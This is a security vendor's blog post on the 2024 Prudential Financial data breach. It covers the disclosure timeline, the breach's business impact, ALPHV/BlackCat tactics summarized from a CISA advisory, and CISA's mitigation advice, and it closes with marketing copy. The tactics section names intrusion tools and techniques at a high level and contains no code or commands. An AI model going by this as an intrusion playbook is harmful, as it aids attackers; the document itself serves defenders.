Prudential Data Breach Affecting 2.5 Million

Prudential Finance Data Breach

• February 5, 2024

  After initially disclosing a data breach in February to the Securities and Exchange Commission (SEC), Prudential Financial filed a Form 8-K reporting the detected unauthorized access to its IT infrastructure.

• February 13, 2024

  Prudential Financial filed a Form 8-K with the SEC, stating that it had not found evidence of customer or client data theft and that the incident was reported to law enforcement and regulatory authorities.

• February 16, 2024

  Security Week reported that BlackCat claimed responsibility for the attack by listing it on their Tor site. However, Prudential Financial has not confirmed this. Prudential stated that the attackers accessed administrative and user data, as well as user accounts associated with employees and contractors.

• April 3, 2024

  In a filing with the Maine Attorney General’s Office, Prudential revealed that the hackers had stolen information from more than 36,000 individuals, who are being sent written notifications about the incident. The company confirmed that the attackers no longer have access to its systems.

• June 17, 2024

  Plaintiff Constance Boyd filed a class-action lawsuit against Prudential Financial Inc.

• July 1,2024

  DarkReading reports that the Prudential data breach victim count soars to 2.5 million individuals.

Prudential, the second-largest life insurance company in the United States, employs 40,000 people worldwide and reported revenues exceeding $50 billion in 2023. Following two SEC filings concerning data breaches on February 5, which impacted its customers, Prudential has now voluntarily disclosed to the SEC that the data of 2.5 million individuals was obtained by a threat actor. This disclosure comes in the wake of several Fortune 500 companies, including Bank of America, being affected by cyberattacks this year.

The ransomware group ALPHV (also known as BlackCat) took responsibility for the attack, but Prudential Financial has not acknowledged that ALPHV was behind it. It is worth noting that this gang was also responsible for the United Health cyberattack, during which they stole data resulting in an estimated $22 million in ransom, and then ceased operations with an exit scam.

In February, Prudential stated there was no evidence of customer or client data theft, but later disclosed the data breach in a filing with the U.S. Securities and Exchange Commission. By late March, the company announced that more than 36,000 individuals might have been affected.

In an incident notice update filed with the Maine Attorney General’s Office in the last week of June, Prudential revealed that the incident resulted in the data of 2,556,210 individuals being compromised. The stolen information included names, addresses, driver’s license numbers, and non-driver identification card numbers, as previously disclosed by the company.

Additionally, Dark Reading reported that Prudential has initiated its incident response, which is still in the early stages. It is currently unclear whether the attackers accessed additional information or systems, stole customer or client data, or if the incident will have a material impact on Prudential’s operations. With no evidence of any of these scenarios, Prudential is not yet mandated to report the breach. However, researchers suggest that the firm’s SEC filing could indicate a new trend of proactive disclosures

Ransomware attacks have seen a dramatic increase, with the average ransom payment rising by 500% in the last year. 63% of ransom demands were for $1 million or more, and 30% of demands exceeded $5 million. The FBI reported that BlackCat, also known as ALPHV, is among the top five ransomware gangs targeting U.S. businesses.

DarkReading reported that a troubling new trend is emerging where ransomware gangs are weaponizing the law. They are filing formal complaints with the SEC, alleging that their recent victims are not complying with new disclosure regulations. These regulations mandate that publicly traded companies must disclose breaches within four days. ALPHV (BlackCat) did this in another incident, even though the SEC clarified that this rule would only come into effect in December. If this rule is enforced, threat actors could exploit the laws to further pressure their victims, playing a double game with legal requirements.

The attack on Prudential Financial has significant implications. Financial losses will likely result from incident response, remediation, and potential regulatory fines, alongside potential lawsuits like the class action filed by Constance Boyd. The breach has also damaged Prudential’s reputation, eroding customer trust and potentially leading to customer attrition and long-term brand damage.

Increased regulatory scrutiny and potential penalties from authorities such as the SEC and state attorney generals could follow, adding to operational burdens.
The attack and subsequent investigation may disrupt day-to-day operations, as compromised employee and contractor accounts create internal inefficiencies and vulnerabilities. Legal ramifications include significant legal fees and settlements from the class action lawsuit and other potential legal actions, diverting executive focus from strategic initiatives. Prudential will likely need to invest heavily in enhancing its cybersecurity infrastructure, training, and protocols to prevent future incidents, leading to increased operational costs and a reevaluation of current IT practices.

The attack could also impact Prudential’s stock price as investors react to the breach’s fallout, potentially affecting shareholder value. With new disclosure regulations on the horizon, Prudential will need to adapt to more stringent reporting requirements, involving significant changes to internal processes and increased transparency regarding cybersecurity practices.

There is currently no information available regarding the specific entry point or method through which ALPHV Blackcat affiliates infiltrated Prudential Financials’ IT infrastructure. However, the CISA advisory highlighted that ALPHV Blackcat affiliates employ sophisticated social engineering tactics and open-source intelligence gathering to initially breach companies. They often impersonate IT or helpdesk personnel via phone calls or SMS to obtain employee credentials, facilitating network access. Once inside, they deploy remote access tools like AnyDesk, Mega sync, and Splashtop, creating specific user accounts like “aadmin” and leveraging Kerberos token generation for domain access. During the UnitedHealth incident, it was speculated that BlackCat exploited vulnerabilities in ConnectWise, which serves as a remote access tool.

Following network infiltration, ALPHV Blackcat affiliates use legitimate tools such as Plink and Ngrok for remote access and employ beaconing techniques with tools like Brute Ratel C4 and Cobalt Strike for command and control. They utilize Evilginx2 for adversary-in-the-middle attacks to capture credentials and session cookies, exploiting weaknesses in multifactor authentication and domain security. They further move laterally across networks, extracting passwords from domain controllers and backup servers.

To evade detection, they utilize whitelisted applications like Metasploit, clear logs on exchange servers, and employ cloud services such as Mega.nz or Dropbox for data exfiltration. Ransomware deployment includes embedding ransom notes as “file.txt” and terminating security processes with tools like POORTRY and STONESTOP.

Some affiliates exfiltrate data without deploying ransomware or communicating with victims via TOR, Tox, or encrypted channels to extort payments. They may offer cyber remediation advice post-payment, promising vulnerability reports, and security recommendations. The encrypted files typically adopt a naming convention such as “RECOVER-(seven-digit extension) FILES.txt”.

CISA has issued recommendations to help organizations mitigate the threat posed by the ALPHV/Blackcat ransomware. These recommendations include:

1. Routinely take inventory of assets and data to identify authorized and unauthorized devices and software.
2. Prioritize remediation of known exploited vulnerabilities.
3. Enable and enforce multifactor authentication with strong passwords.

Close unused ports and remove applications not deemed necessary for day-to-day operations.

• Additionally, organizations are advised to secure remote access tools, implement FIDO/WebAuthn authentication or PKI-based MFA, monitor network activity for abnormalities, provide user training on social engineering and phishing attacks, and utilize internal mail and messaging monitoring.

Furthermore, organizations are encouraged to validate their security controls by testing them against the MITRE ATT&CK for Enterprise framework and the threat behaviors associated with the ALPHV Blackcat ransomware or with experts like BreachLock. By following these recommendations, organizations can strengthen their cybersecurity posture and reduce the risk of compromise by ALPHV Blackcat threat actors.

https://www.cisa.gov/sites/default/files/2024-02/AA23-353A.stix_.xml

https://www.cisa.gov/sites/default/files/2024-02/AA23-353A-StopRansomware-ALPHV-Blackcat.stix_.json

BreachLock is a global leader in Continuous Attack Surface Discovery and Penetration Testing. Continuously discover, prioritize, and mitigate exposures with evidence-backed Attack Surface Management, Penetration Testing, and Red Teaming.

Elevate your defense strategy with an attacker’s view that goes beyond common vulnerabilities and exposures. Each risk we uncover is backed by validated evidence. We test your entire attack surface and help you mitigate your next cyber breach before it occurs.

Know Your Risk. Contact BreachLock today!